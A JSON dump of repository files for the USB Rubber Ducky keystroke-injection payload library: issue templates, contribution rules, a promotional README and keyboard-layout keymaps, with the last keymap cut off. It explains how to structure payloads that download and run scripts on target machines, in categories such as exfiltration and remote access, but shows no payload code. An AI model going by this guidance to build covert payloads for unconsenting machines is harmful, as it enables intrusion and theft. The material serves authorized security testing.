[ { "path": ".github/ISSUE_TEMPLATE/config.yaml", "content": "blank_issues_enabled: false\n contact_links:\n - name: Need help?\n url: https://hak5.org/discord\n about: Feel free to ask a question in our community Discord!\n" }, { "path": ".github/ISSUE_TEMPLATE/payload_bug.yaml", "content": "name: Payload Bug\ndescription: Report an issue to help improve payloads provided within this project. \ntitle: \"[Payload BUG] write a short description here\"\n\nbody:\n - type: markdown\n attributes:\n value: Keep in mind - the more information provided here, the more actionable it will become. Please provide detailed answers to the prompts below. Please read and answer carefully. [Common Ducky Troubleshooting](https://docs.hak5.org/hak5-usb-rubber-ducky/troubleshooting/common-issues)\n\n - type: markdown\n attributes:\n value: If you are simply seeking assistance with a payload contact the payload author or join our [Community discord](https://hak5.org/discord)\n\n - type: input\n id: PayloadName\n attributes:\n label: \"Payload Title\"\n description: \"Title of the payload you're experiencing an issue with\"\n placeholder: \"ex. ExampleTitle\"\n validations:\n required: true\n\n - type: input\n id: PayloadURL\n attributes:\n label: \"Payload URL\"\n description: \"Provide a direct link (URL) to the payload in question within this repo. Not the payload name. \"\n placeholder: \"ex. https://github.com/hak5/usbrubberducky-payloads/........\"\n validations:\n required: true\n\n - type: textarea\n id: Modifications\n attributes:\n label: \"Payload Setup\"\n description: \"Describe what you've done to set up the payload. This includes any required configuration. If any, please list what changes or modifications you have made to the original payload to experience this problem. DO NOT SHARE PRIVATE INFO SUCH AS YOUR DOMAINS OR API KEYS.\"\n placeholder: \"DO NOT LEAVE THIS BLANK. ex. I changed the DEFINE URL example.com to a domain of my own where I'm hosting xyz\"\n validations:\n required: true\n\n - type: textarea\n id: Description\n attributes:\n label: \"Problem Description\"\n description: \"A thorough description of the issue\"\n placeholder: 'DO NOT LEAVE THIS BLANK. ex. Here is what I am trying to do; I did X and expected Y to happen but instead...'\n validations:\n required: true\n\n - type: textarea\n id: attempts\n attributes:\n label: \"Troubleshooting steps\"\n description: \"List any steps youve taken trying to troubleshoot or solve the problem you're experiencing. \"\n placeholder: \"DO NOT LEAVE THIS BLANK. ex. I tried A, B, and C, to fix the issue, but...\"\n validations:\n required: true\n\n - type: textarea\n id: causes\n attributes:\n label: \"Suspected Cause\"\n description: \"Could this be because ...?\"\n placeholder: \"ex. Maybe this is because...\"\n validations:\n required: false\n \n - type: textarea\n id: screenshots\n attributes:\n label: \"Screenshots or additional information\"\n description: \"Please add screenshots or extra details without a specific category if applicable\"\n validations:\n required: false\n\n - type: checkboxes\n id: checklist\n attributes:\n label: \"Checklist ✅ - READ CAREFULLY\"\n options:\n - label: \"I checked and didn't find a similar issue already reported\"\n required: true\n\n - label: \"I am using PayloadStudio to encode this payload\"\n required: true\n\n - label: \"I made sure to redact any private information in the details shared above\"\n required: true\n\n - label: \"I have read and followed the documentation provided by the original payload author and configured the payload (if required)\"\n required: true\n\n - label: \"I have confirmed I am deploying this payload with the correct device intended by the original author (Original USB Rubber Ducky vs New USB Rubber Ducky)\"\n required: true\n\n - label: \"I have confirmed I am deploying this payload on the correct target host intended by the original author (Windows, Mac, Linux, etc)\"\n required: true\n\n - label: \"I have confirmed the payload is compiled in the correct keyboard language for the target host I'm trying to deploy it on (US, DE, etc)\"\n required: true\n\n - label: \"I have actually read the above checkboxes before checking them, including this one, which I have intentionally left unchecked as confirmation of this statement\"\n required: false\n\n - type: checkboxes\n id: agreement\n attributes:\n label: \"Agreement\"\n options:\n - label: \"I believe this is an issue with the actual payload itself. I acknowledge this form is not a request for help following instructions.\"\n required: true\n\n - label: \"I have carefully read and filled out every section of this issue form to the best of my ability. I acknowledge by providing insufficient information I cannot receieve adequate assistance.\"\n required: true\n" }, { "path": ".gitignore", "content": "# MacOS\n.DS_Store\n" }, { "path": "CONTRIBUTING.md", "content": "### Exported from README.md\n\n

Contributing

\n\n

\n\n
\nView Featured Payloads and Leaderboard \n

\n\n# Please adhere to the following best practices and style guides when submitting a payload.\n\nOnce you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.\n\nPlease include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit. \n\n\n### Purely Destructive payloads will not be accepted. No, it's not \"just a prank\".\nSubject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.\n\n\n\n## Naming Conventions\nPlease give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.\n\n## Staged Payloads\n\"Staged payloads\" are payloads that **download** code from some resource external to the payload.txt. \n\nWhile staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**. \n\nStaged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.\nSee: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)\n\nAdditionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.\n\n### Including URLs\nURLs used for retrieving staged code should refer exclusively to **example.com** using DEFINE in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration). \n\n### Staged Example\n\n**Example scenario: your payload downloads a script and the executes it on a target machine.**\n- Include the script in the directory with your payload\n- Provide instructions for the user to move the script to the appropriate hosting service.\n- Provide a DEFINE with the placeholder example.com for the user to easily configure once they have hosted the script\n\n[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)\n\n## Payload Configuration\nBe sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.\nIn many cases, payloads will require some level of configuration **by the end payload user**. \n\n- Abstract configuration(s) for ease of use. Use `DEFINE` where possible. Best practice is to use labels that start with # for easy identification throughout your payload.\n- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...\n- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.\n- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using comments at the top of your payload or \"inline\" where applicable\n
\nExample: \n\tBEGINNING OF PAYLOAD \n\t... Payload Documentation... \n\n\tREM CONFIGURATION\n\tREM REQUIRED - Provide URL used for Example\n\tDEFINE #MY_TARGET_URL example.com\n\n\tREM OPTIONAL - How long until payload starts; default 5s\n\tDEFINE #BOOT_DELAY 5000\n\n\tDELAY #BOOT_DELAY\n\t...\n\tSTRING #MY_TARGET_URL\n\t...\n
\n\n## Payload Documentation \nPayloads should begin with `REM` comments specifying the title of the payload, the author, the target, and a brief description.\n
\nExample:\n\tBEGINNING OF PAYLOAD\n\n\tREM Title: Example Payload\n\tREM Author: Korben Dallas\n\tREM Description: Opens hidden powershell and\n\tREM Target: Windows 10\n\tREM Props: Hak5, Darren Kitchen, Korben\n\tREM Version: 1.0\n\tREM Category: General\n
\n" }, { "path": "README.md", "content": "# Payload Library for the [USB Rubber Ducky](https://hak5.org/products/usb-rubber-ducky?variant=39874478932081) by [Hak5](https://hak5.org)\n\nThis repository contains payloads, extensions and languages for the Hak5 USB Rubber Ducky. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.\n\n**Payloads here are written in official DuckyScript™ specifically for the USB Rubber Ducky. Payloads here must be compiled using Hak5 PayloadStudio. Hak5 does NOT guarantee payload functionality.** See Legal and Disclaimers\n\n\n\n
\n\n     \n\n
\n\n\n
\n
\n

\n\n
\nView Featured Ducky Payloads and Leaderboard\n
Get your payload in front of thousands. Enter to win over $2,000 in prizes in the Hak5 Payload Awards!\n

\n\n\n
\n\n     \n\n     \n\n     \n\n     \n\n

\n\n
\n\n# Table of contents\n
\n \n
\n\n\n## Shop\n- [NEW USB Rubber Ducky](https://hak5.org/products/usb-rubber-ducky?variant=39874478932081 \"Purchase the NEW USB Rubber Ducky\")\n- [PayloadStudio Pro](https://hak5.org/products/payload-studio-pro \"Purchase PayloadStudio Pro\")\n- [Shop All Hak5 Tools](https://shop.hak5.org \"Shop All Hak5 Tools\")\n## Getting Started\n- [Build and Encode Payloads with PayloadStudio](#build-your-payloads-with-payloadstudio) | [QUICK START GUIDE](https://docs.hak5.org/hak5-usb-rubber-ducky/unboxing-quack-start-guide \"QUICK START GUIDE\") | [Your First Payload](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/hello-world)\n## Documentation / Learn More\n- [Documentation](https://docs.hak5.org/hak5-usb-rubber-ducky/ \"Documentation\") | [Quick Reference Guide](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-quick-reference \"Quick Reference Guide\")\n- [Advanced DuckyScript Online Course](https://shop.hak5.org/collections/usb-rubber-ducky-essentials/products/advanced-duckyscript-course \"DuckyScript Online Course\") | [Textbook](https://shop.hak5.org/collections/usb-rubber-ducky-essentials/products/usb-rubber-ducky-textbook \"Textbook\")\n## Community\n*Got Questions? Need some help? Reach out:*\n- [Discord](https://hak5.org/discord/ \"Discord\") | [Forums](https://forums.hak5.org/forum/111-new-usb-rubber-ducky/ \"Forums\")\n\n\n## Additional Links\n Follow the creators
\n

\n\tKorben's Socials
\t\n\t \n\t\n
\n\tDarren's Socials
\n\t \n\t\n

\n\n
\n

About the NEW USB Rubber Ducky

\n\nA \"flash drive\" that types keystroke injection payloads into unsuspecting devices at incredible speeds.\n\n\n
\n\t
\nLaunch Video | \nIntroducing Keystroke Reflection |\nIntroducing OS Detection\n

\n
\n\n

\n\n
\nNew USB Rubber Ducky (A+C, DuckyScript 3.0, 2022)\n

\n\nComputers trust humans. Humans use keyboards. Hence the universal spec — HID, or Human Interface Device.\n\nA keyboard presents itself as a HID, and in turn it's inherently trusted as human by the computer.\n\nThe USB Rubber Ducky — which looks like an innocent flash drive to humans — takes advantage of this trust to deliver powerful payloads, injecting keystrokes at superhuman speeds. \n\nEasily automate any task you can perform with a keyboard with an easy to learn language designed specifically for the USB Rubber Ducky.\n\n\n\n# About DuckyScript™\n\n## Legacy DuckyScript (1.0)\nHak5 introduced Keystroke Injection in 2010 with the USB Rubber Ducky™. This technique, developed by Hak5 founder Darren Kitchen, was his weapon of choice for automating mundane tasks at his IT job — fixing printers, network shares and the like.\nToday the USB Rubber Ducky is a hacker culture icon, synonymous with the keystroke injection technique it pioneered. It’s found its way into the hearts and toolkits of Cybersecurity and IT pros the world over — including many movies and TV shows!\nCore to its success is its simple language, DuckyScript™. Originally just three commands, it could be learned by anyone—regardless of experience—in minutes.\n\n With the new USB Rubber Ducky in 2022, DuckyScript 3.0 has been introduced.\n## DuckyScript 3.0\nDuckyScript 3.0 is a feature rich, structured programming language. It includes all of the previously available commands and features of the original DuckyScript.\n\n(DuckyScript 3.0 is backwards compatible with DuckyScript 1.0; this means all your favorite DuckyScript 1.0 payloads are valid DuckyScript 3.0) \n\nAdditionally, DuckyScript 3.0 introduces [control flow constructs](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/conditional-statements \"View Documentation\"), [loops](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/loops \"View Documentation\"), [functions](https://docs.hak5.org/hak5-usb-rubber-ducky/operators-conditions-loops-and-functions/functions \"View Documentation\"), [extensions](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions \"View Documentation\").\nPlus, DuckyScript 3.0 includes many features specific to [keystroke injection](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/keystroke-injection \"View Documentation\") attack/automation, such as [HID & Storage attack modes](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes \"View Documentation\"), OS Detection, [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration#the-keystroke-reflection-attack \"View Documentation\") ([Video + Whitepaper](https://shop.hak5.org/pages/keystroke-reflection \"Keystroke Reflection Video + Whitepaper\")), [jitter](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/jitter \"View Documentation\") and [randomization](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/randomization \"View Documentation\") to name a few.\n\nWhile many of the Hak5 Tools run various versions of DuckyScript; unlike the [Bash Bunny](https://shop.hak5.org/products/bash-bunny), [Key Croc](https://shop.hak5.org/products/key-croc) and even the [officially licenced DuckyScript compatible devices from O.MG](https://shop.hak5.org/collections/mischief-gadgets/ \"O.MG\") - which use `INTERPRETED` versions of DuckyScript - the USB Rubber Ducky uses `COMPILED inject.bin` payloads. \n\n\n_Interpreted DuckyScript means the payload runs straight from `source code` (the code you write e.g. `DELAY 1000`)._\n\n_Compiled DuckyScript means that there is both `source code` and an `inject.bin` generated from the source code. (DuckyScript 1.0 was \"encoded\" rather than \"compiled\" - references to either mean the same)_\n\nThe files in this repository are _the source code_ in the form of `payload.txt` files. \n\n

Learn DuckyScript directly from the creators

\n

\n\n\n

\nLearn Advanced DuckyScript directly from the creators and unlock creative potential for the USB Rubber Ducky. Covering all aspects of advanced DuckyScript and Keystroke Injection attacks, these practical lessons build on one another from the basics on up.\n\nThis online course includes 7 hours of video instruction covering 54 lessons, 40+ exercises to reinforce your knowledge, quizzes throughout as well as 8 projects to test your skills.\n

\n

\n\n\n\n

Build your payloads with PayloadStudio

\n

\nTake your DuckyScript™ payloads to the next level with this full-featured, web-based (entirely client side) development environment.\n
\n\n
\nPayload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!\n

\nSupports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!\n


\nBecome a PayloadStudio Pro and Unleash your hacking creativity! \n
\nOR\n
\n Try Community Edition FREE \n

\n\n
\n Payload Studio Themes Preview GIF \n

\n\n
\n Payload Studio Autocomplete Preview GIF \n

\n\n\n\n\n## DuckyScript Ecosystem\n\n

Languages

\nSupport for different keyboard layouts can be found, modified or contributed to in the languages/ directory of this repository.\n\nCompiling payloads for the correct language / keyboard layout has never been easier:\n\n Open PayloadStudio \\> Settings \\> Compiler Settings \n\nPayloadStudio includes all the languages provided in this repo built-in for your convenience. \n\nPayloadStudio Pro has a dedicated language editor specifically for editing and building language files! \n\nThe default language is US (languages/us.json)\n\n

Extensions

\nIt should be clear by now that so much is possible with DuckyScript 3.0. The combination of keystroke injection with various attack modes, logic and data processing, along with the built-in features like randomization and internal variables — the possibilities for advanced payload functions seems endless.\n

\n
\n\n
\n Payload Studio Extensions Preview GIF\n

\n\nAs the payload library continues to grow, so too will the DuckyScript 3.0 language. To that end, the extensions feature of the language and editor facilitate the continued growth of the language.\nExtensions are blocks of reusable code which may be implemented in any payload. Think of them as snippets, or building blocks, upon which your next payload may benefit.\nWhile Hak5 developers cannot envision all possible use cases for the USB Rubber Ducky, the DuckyScript language has been architected in such a way so that the community as a whole may gain new features and abilities with each contributed extension.\n\nExtensions (beyond some first party examples) are currently reserved for collections of helper functions (+ required variables, defines, and configuration options) required to make a complex task simple - abstracting very complex problems down into one or a few calls for the ease of use to others (example: the translate extension).\n\nTo add an extension to your payload, simply start typing the name of the desired extension in your payload from within PayloadStudio then select it from the auto-complete drop down. Alternatively the full library can be found from within the Extensions folder of this repo.\n\n[Read more here](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/extensions \"Read more here\")\n\n\n

Contributing

\n\n

\n\n
\nView Featured Payloads and Leaderboard \n

\n\n# Please adhere to the following best practices and style guides when submitting a payload.\n\nOnce you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.\n\nPlease include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit. \n\n\n### Purely Destructive payloads will not be accepted. No, it's not \"just a prank\".\nSubject to change. Please ensure any submissions meet the [latest version](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md) of these standards before submitting a Pull Request.\n\n\n\n## Naming Conventions\nPlease give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.\n\n## Staged Payloads\n\"Staged payloads\" are payloads that **download** code from some resource external to the payload.txt. \n\nWhile staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**. \n\nStaged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.\nSee: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)\n\nAdditionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.\n\n### Including URLs\nURLs used for retrieving staged code should refer exclusively to **example.com** using DEFINE in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration). \n\n### Staged Example\n\n**Example scenario: your payload downloads a script and the executes it on a target machine.**\n- Include the script in the directory with your payload\n- Provide instructions for the user to move the script to the appropriate hosting service.\n- Provide a DEFINE with the placeholder example.com for the user to easily configure once they have hosted the script\n\n[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)\n\n## Payload Configuration\nBe sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.\nIn many cases, payloads will require some level of configuration **by the end payload user**. \n\n- Abstract configuration(s) for ease of use. Use `DEFINE` where possible. Best practice is to use labels that start with # for easy identification throughout your payload.\n- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...\n- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.\n- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using comments at the top of your payload or \"inline\" where applicable\n
\nExample: \n\tBEGINNING OF PAYLOAD \n\t... Payload Documentation... \n\n\tREM CONFIGURATION\n\tREM REQUIRED - Provide URL used for Example\n\tDEFINE #MY_TARGET_URL example.com\n\n\tREM OPTIONAL - How long until payload starts; default 5s\n\tDEFINE #BOOT_DELAY 5000\n\n\tDELAY #BOOT_DELAY\n\t...\n\tSTRING #MY_TARGET_URL\n\t...\n
\n\n## Payload Documentation \nPayloads should begin with `REM` comments specifying the title of the payload, the author, the target, and a brief description.\n
\nExample:\n\tBEGINNING OF PAYLOAD\n\n\tREM Title: Example Payload\n\tREM Author: Korben Dallas\n\tREM Description: Opens hidden powershell and\n\tREM Target: Windows 10\n\tREM Props: Hak5, Darren Kitchen, Korben\n\tREM Version: 1.0\n\tREM Category: General\n
\n\n

Legal

\n\nPayloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.\n\nUSB Rubber Ducky and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.\nUSB Rubber Ducky and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)\nDuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.\nThis material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.\nHak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.\n\nSee also: \n\n[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)\n\t\n[Terms of Service](https://shop.hak5.org/pages/terms-of-service)\n\n# Disclaimer\n

As with any script, you are advised to proceed with caution.

\n

Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.

\n" }, { "path": "languages/be.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"q\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \",\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"a\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"z\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"w\":\"00,00,1d\",\n \"&\":\"00,00,1e\",\n \"\\\"\":\"00,00,20\",\n \"'\":\"00,00,21\",\n \"(\":\"00,00,22\",\n \"!\":\"00,00,25\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \")\":\"00,00,2d\",\n \"-\":\"00,00,2e\",\n \"$\":\"00,00,30\",\n \"m\":\"00,00,33\",\n \";\":\"00,00,36\",\n \":\":\"00,00,37\",\n \"=\":\"00,00,38\",\n \"CAPSLOCK\":\"00,00,39\",\n \"F1\":\"00,00,3a\",\n \"F2\":\"00,00,3b\",\n \"F3\":\"00,00,3c\",\n \"F4\":\"00,00,3d\",\n \"F5\":\"00,00,3e\",\n \"F6\":\"00,00,3f\",\n \"F7\":\"00,00,40\",\n \"F8\":\"00,00,41\",\n \"F9\":\"00,00,42\",\n \"F10\":\"00,00,43\",\n \"F11\":\"00,00,44\",\n \"F12\":\"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\":\"00,00,47\",\n \"BREAK\":\"00,00,48\",\n \"PAUSE\":\"00,00,48\",\n \"INSERT\":\"00,00,49\",\n \"HOME\":\"00,00,4a\",\n \"PAGEUP\":\"00,00,4b\",\n \"DEL\":\"00,00,4c\",\n \"DELETE\":\"00,00,4c\",\n \"END\":\"00,00,4d\",\n \"PAGEDOWN\":\"00,00,4e\",\n \"RIGHT\":\"00,00,4f\",\n \"RIGHTARROW\":\"00,00,4f\",\n \"LEFT\":\"00,00,50\",\n \"LEFTARROW\":\"00,00,50\",\n \"DOWN\":\"00,00,51\",\n \"DOWNARROW\":\"00,00,51\",\n \"UP\":\"00,00,52\",\n \"UPARROW\":\"00,00,52\",\n \"<\":\"00,00,64\",\n \"APP\":\"00,00,65\",\n \"MENU\":\"00,00,65\",\n \"ALT-TAB\":\"00,00,71\",\n \"CONTROL\":\"01,00,00\",\n \"CTRL\":\"01,00,00\",\n \"SHIFT\":\"02,00,00\",\n \"Q\":\"02,00,04\",\n \"B\":\"02,00,05\",\n \"C\":\"02,00,06\",\n \"D\":\"02,00,07\",\n \"E\":\"02,00,08\",\n \"F\":\"02,00,09\",\n \"G\":\"02,00,0a\",\n \"H\":\"02,00,0b\",\n \"I\":\"02,00,0c\",\n \"J\":\"02,00,0d\",\n \"K\":\"02,00,0e\",\n \"L\":\"02,00,0f\",\n \"?\":\"02,00,10\",\n \"N\":\"02,00,11\",\n \"O\":\"02,00,12\",\n \"P\":\"02,00,13\",\n \"A\":\"02,00,14\",\n \"R\":\"02,00,15\",\n \"S\":\"02,00,16\",\n \"T\":\"02,00,17\",\n \"U\":\"02,00,18\",\n \"V\":\"02,00,19\",\n \"Z\":\"02,00,1a\",\n \"X\":\"02,00,1b\",\n \"Y\":\"02,00,1c\",\n \"W\":\"02,00,1d\",\n \"1\":\"02,00,1e\",\n \"2\":\"02,00,1f\",\n \"3\":\"02,00,20\",\n \"4\":\"02,00,21\",\n \"5\":\"02,00,22\",\n \"6\":\"02,00,23\",\n \"7\":\"02,00,24\",\n \"8\":\"02,00,25\",\n \"9\":\"02,00,26\",\n \"0\":\"02,00,27\",\n \"_\":\"02,00,2e\",\n \"*\":\"02,00,30\",\n \"M\":\"02,00,33\",\n \"%\":\"02,00,34\",\n \".\":\"02,00,36\",\n \"/\":\"02,00,37\",\n \"+\":\"02,00,38\",\n \">\":\"02,00,64\",\n \"CTRL-SHIFT\":\"03,00,00\",\n \"ALT\":\"04,00,00\",\n \"CTRL-ALT\":\"05,00,00\",\n \"ALT-SHIFT\":\"06,00,00\",\n \"COMMAND\":\"08,00,00\",\n \"GUI\":\"08,00,00\",\n \"WINDOWS\":\"08,00,00\",\n \"COMMAND-OPTION\":\"12,00,00\",\n \"|\":\"40,00,1e\",\n \"@\":\"40,00,1f\",\n \"#\":\"40,00,20\",\n \"^\":\"40,00,23\",\n \"{\":\"40,00,26\",\n \"}\":\"40,00,27\",\n \"[\":\"40,00,2f\",\n \"]\":\"40,00,30\",\n \"`\":\"40,00,31\",\n \"~\":\"40,00,38\",\n \"\\\\\":\"40,00,64\",\n \"COMMAND-CTRL-SHIFT\":\"40,00,64\",\n \"COMMAND-CTRL\":\"40,00,64\",\n \"COMMAND-OPTION-SHIFT\":\"40,00,64\"\n}" }, { "path": "languages/br.json", "content": "{\n \"__comment\":\"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\":\" \",\n \"__comment\":\"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\":\" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\":\" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\":\" \",\n \"__comment\":\"Definition of these 3 bytes can be found\",\n \"__comment\":\" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\":\" of document Device Class Definition for HID Version 1.11\",\n \"__comment\":\" - byte 1: Modifier keys\",\n \"__comment\":\" - byte 2: Reserved\",\n \"__comment\":\" - byte 3: Keycode 1\",\n \"__comment\":\" \",\n \"__comment\":\"Both documents can be obtained from link here\",\n \"__comment\":\" http://www.usb.org/developers/hidpage/\",\n \"__comment\":\" \",\n \"__comment\":\"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\":\" \",\n \"a\":\"00,00,04\",\n \"b\":\"00,00,05\",\n \"c\":\"00,00,06\",\n \"d\":\"00,00,07\",\n \"e\":\"00,00,08\",\n \"f\":\"00,00,09\",\n \"g\":\"00,00,0a\",\n \"h\":\"00,00,0b\",\n \"i\":\"00,00,0c\",\n \"j\":\"00,00,0d\",\n \"k\":\"00,00,0e\",\n \"l\":\"00,00,0f\",\n \"m\":\"00,00,10\",\n \"n\":\"00,00,11\",\n \"o\":\"00,00,12\",\n \"p\":\"00,00,13\",\n \"q\":\"00,00,14\",\n \"r\":\"00,00,15\",\n \"s\":\"00,00,16\",\n \"t\":\"00,00,17\",\n \"u\":\"00,00,18\",\n \"v\":\"00,00,19\",\n \"w\":\"00,00,1a\",\n \"x\":\"00,00,1b\",\n \"y\":\"00,00,1c\",\n \"z\":\"00,00,1d\",\n \"1\":\"00,00,1e\",\n \"2\":\"00,00,1f\",\n \"3\":\"00,00,20\",\n \"4\":\"00,00,21\",\n \"5\":\"00,00,22\",\n \"6\":\"00,00,23\",\n \"7\":\"00,00,24\",\n \"8\":\"00,00,25\",\n \"9\":\"00,00,26\",\n \"0\":\"00,00,27\",\n \"ENTER\":\"00,00,28\",\n \"ESC\":\"00,00,29\",\n \"ESCAPE\":\"00,00,29\",\n \"TAB\":\"00,00,2b\",\n \" \":\"00,00,2c\",\n \"SPACE\":\"00,00,2c\",\n \"-\":\"00,00,2d\",\n 